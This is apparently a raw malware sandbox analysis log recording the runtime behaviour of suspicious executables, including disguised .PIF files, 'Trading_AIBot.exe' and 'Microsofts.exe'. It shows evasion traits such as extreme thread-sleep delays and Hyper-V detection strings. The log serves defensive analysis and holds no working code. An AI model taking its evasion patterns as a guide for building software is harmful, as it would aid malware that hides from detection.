Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 25270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 254E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 25310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 45E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 59B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2D9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 29D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 49D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 336B0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 33A90000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 33870000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2CE60000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2D2E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2F2E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2D000000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2ED90000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 30D90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

8_2_004019F0

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6262			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 522

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_8-14258

Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 3940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5716	Thread sleep count: 6262 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6140	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6940	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 3524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5700	Thread sleep time: -31320000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5700	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B258B4

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000

Source: Oupzhkpr.PIF, 00000011.00000002.2311886238.000000000063E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(+f
Source: x.exe, 00000004.00000002.2175552195.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Microsofts.exe, 0000000A.00000002.3367947903.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2408866891.0000000000836000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2525132204.0000000000934000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node			graph_4-25973
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	API call chain: ExitProcess graph end node			graph_22-26795

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Process information queried: ProcessInformation

Jump to behavior

